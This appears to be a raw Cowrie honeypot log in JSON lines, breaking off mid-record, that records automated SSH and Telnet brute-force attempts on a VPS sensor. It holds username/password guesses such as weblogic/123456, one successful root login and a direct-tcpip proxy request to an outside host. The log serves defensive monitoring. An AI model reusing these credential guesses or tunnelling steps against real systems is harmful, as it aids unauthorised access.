{"eventid":"cowrie.login.failed","username":"weblogic","password":"123456","message":"login attempt [weblogic/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T12:54:55.514430Z","src_ip":"212.227.125.160","session":"7bc5ba0ffcde"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:54:56.690887Z","src_ip":"212.227.125.160","session":"7bc5ba0ffcde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45673,"dst_ip":"1.2.3.4","dst_port":23,"session":"a115cdfc72b1","protocol":"telnet","message":"New connection: 212.227.125.160:45673 (1.2.3.4:23) [session: a115cdfc72b1]","sensor":"my-vps","timestamp":"2025-08-28T12:55:33.615747Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53290,"dst_ip":"1.2.3.4","dst_port":22,"session":"52f5f119d4f4","protocol":"ssh","message":"New connection: 212.227.125.160:53290 (1.2.3.4:22) [session: 52f5f119d4f4]","sensor":"my-vps","timestamp":"2025-08-28T12:55:35.536950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:55:35.537667Z","src_ip":"212.227.125.160","session":"52f5f119d4f4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:55:35.709356Z","src_ip":"212.227.125.160","session":"52f5f119d4f4"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"password","message":"login attempt [weblogic/password] failed","sensor":"my-vps","timestamp":"2025-08-28T12:55:36.478821Z","src_ip":"212.227.125.160","session":"52f5f119d4f4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:55:37.654485Z","src_ip":"212.227.125.160","session":"52f5f119d4f4"}
{"eventid":"cowrie.session.closed","duration":12.609902620315552,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:55:46.225582Z","src_ip":"212.227.125.160","session":"a115cdfc72b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32738,"dst_ip":"1.2.3.4","dst_port":22,"session":"a667eee93074","protocol":"ssh","message":"New connection: 212.227.235.229:32738 (1.2.3.4:22) [session: a667eee93074]","sensor":"my-vps","timestamp":"2025-08-28T12:55:56.702031Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:55:56.703228Z","src_ip":"212.227.235.229","session":"a667eee93074"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33037,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dabc2391927","protocol":"ssh","message":"New connection: 212.227.235.229:33037 (1.2.3.4:22) [session: 7dabc2391927]","sensor":"my-vps","timestamp":"2025-08-28T12:55:56.886762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:55:56.887661Z","src_ip":"212.227.235.229","session":"7dabc2391927"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T12:55:57.045592Z","src_ip":"212.227.235.229","session":"7dabc2391927"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:55:57.518842Z","src_ip":"212.227.235.229","session":"7dabc2391927"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T12:55:57.676748Z","session":"7dabc2391927"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40596,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bd12b26807a","protocol":"ssh","message":"New connection: 212.227.125.160:40596 (1.2.3.4:22) [session: 5bd12b26807a]","sensor":"my-vps","timestamp":"2025-08-28T12:56:15.936015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:56:15.936983Z","src_ip":"212.227.125.160","session":"5bd12b26807a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:56:16.105555Z","src_ip":"212.227.125.160","session":"5bd12b26807a"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"123456789","message":"login attempt [weblogic/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T12:56:16.749575Z","src_ip":"212.227.125.160","session":"5bd12b26807a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:56:17.922422Z","src_ip":"212.227.125.160","session":"5bd12b26807a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33336,"dst_ip":"1.2.3.4","dst_port":22,"session":"52cd5b133fbb","protocol":"ssh","message":"New connection: 212.227.125.160:33336 (1.2.3.4:22) [session: 52cd5b133fbb]","sensor":"my-vps","timestamp":"2025-08-28T12:56:55.618597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:56:55.620123Z","src_ip":"212.227.125.160","session":"52cd5b133fbb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:56:55.790236Z","src_ip":"212.227.125.160","session":"52cd5b133fbb"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"12345","message":"login attempt [weblogic/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:56:56.418320Z","src_ip":"212.227.125.160","session":"52cd5b133fbb"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:56:57.591124Z","src_ip":"212.227.125.160","session":"52cd5b133fbb"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:57:06.887356Z","src_ip":"212.227.235.229","session":"7dabc2391927"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40880,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a6c4329b45c","protocol":"ssh","message":"New connection: 212.227.125.160:40880 (1.2.3.4:22) [session: 7a6c4329b45c]","sensor":"my-vps","timestamp":"2025-08-28T12:57:37.088621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:57:37.089589Z","src_ip":"212.227.125.160","session":"7a6c4329b45c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:57:37.272667Z","src_ip":"212.227.125.160","session":"7a6c4329b45c"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"12345678","message":"login attempt [weblogic/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:57:37.985235Z","src_ip":"212.227.125.160","session":"7a6c4329b45c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:57:39.170559Z","src_ip":"212.227.125.160","session":"7a6c4329b45c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40056,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4f8dfc9c246","protocol":"ssh","message":"New connection: 212.227.125.160:40056 (1.2.3.4:22) [session: b4f8dfc9c246]","sensor":"my-vps","timestamp":"2025-08-28T12:58:23.832646Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:58:23.833691Z","src_ip":"212.227.125.160","session":"b4f8dfc9c246"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40070,"dst_ip":"1.2.3.4","dst_port":22,"session":"b05ba3f7453d","protocol":"ssh","message":"New connection: 212.227.125.160:40070 (1.2.3.4:22) [session: b05ba3f7453d]","sensor":"my-vps","timestamp":"2025-08-28T12:58:24.010943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:58:24.011971Z","src_ip":"212.227.125.160","session":"b05ba3f7453d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:58:24.183171Z","src_ip":"212.227.125.160","session":"b05ba3f7453d"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"qwerty","message":"login attempt [weblogic/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:58:24.699776Z","src_ip":"212.227.125.160","session":"b05ba3f7453d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:58:25.873319Z","src_ip":"212.227.125.160","session":"b05ba3f7453d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34928,"dst_ip":"1.2.3.4","dst_port":22,"session":"a97a90a67701","protocol":"ssh","message":"New connection: 212.227.125.160:34928 (1.2.3.4:22) [session: a97a90a67701]","sensor":"my-vps","timestamp":"2025-08-28T12:59:00.191896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:59:00.193555Z","src_ip":"212.227.125.160","session":"a97a90a67701"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T12:59:00.253796Z","src_ip":"212.227.125.160","session":"a97a90a67701"}
{"eventid":"cowrie.login.failed","username":"validator","password":"solana","message":"login attempt [validator/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T12:59:00.435275Z","src_ip":"212.227.125.160","session":"a97a90a67701"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:59:01.497219Z","src_ip":"212.227.125.160","session":"a97a90a67701"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56660,"dst_ip":"1.2.3.4","dst_port":22,"session":"28999958d3e2","protocol":"ssh","message":"New connection: 217.72.205.35:56660 (1.2.3.4:22) [session: 28999958d3e2]","sensor":"my-vps","timestamp":"2025-08-28T12:59:01.616457Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:59:01.618364Z","src_ip":"217.72.205.35","session":"28999958d3e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59548,"dst_ip":"1.2.3.4","dst_port":22,"session":"80f1aa45c8e3","protocol":"ssh","message":"New connection: 212.227.125.160:59548 (1.2.3.4:22) [session: 80f1aa45c8e3]","sensor":"my-vps","timestamp":"2025-08-28T12:59:05.129347Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:59:05.130399Z","src_ip":"212.227.125.160","session":"80f1aa45c8e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59560,"dst_ip":"1.2.3.4","dst_port":22,"session":"41d2077366d2","protocol":"ssh","message":"New connection: 212.227.125.160:59560 (1.2.3.4:22) [session: 41d2077366d2]","sensor":"my-vps","timestamp":"2025-08-28T12:59:05.293712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:59:05.294542Z","src_ip":"212.227.125.160","session":"41d2077366d2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:59:05.459642Z","src_ip":"212.227.125.160","session":"41d2077366d2"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"123123","message":"login attempt [weblogic/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:59:05.956922Z","src_ip":"212.227.125.160","session":"41d2077366d2"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:59:07.264946Z","src_ip":"212.227.125.160","session":"41d2077366d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59464,"dst_ip":"1.2.3.4","dst_port":22,"session":"47860fd3b87e","protocol":"ssh","message":"New connection: 212.227.125.160:59464 (1.2.3.4:22) [session: 47860fd3b87e]","sensor":"my-vps","timestamp":"2025-08-28T12:59:43.407050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:59:43.408003Z","src_ip":"212.227.125.160","session":"47860fd3b87e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 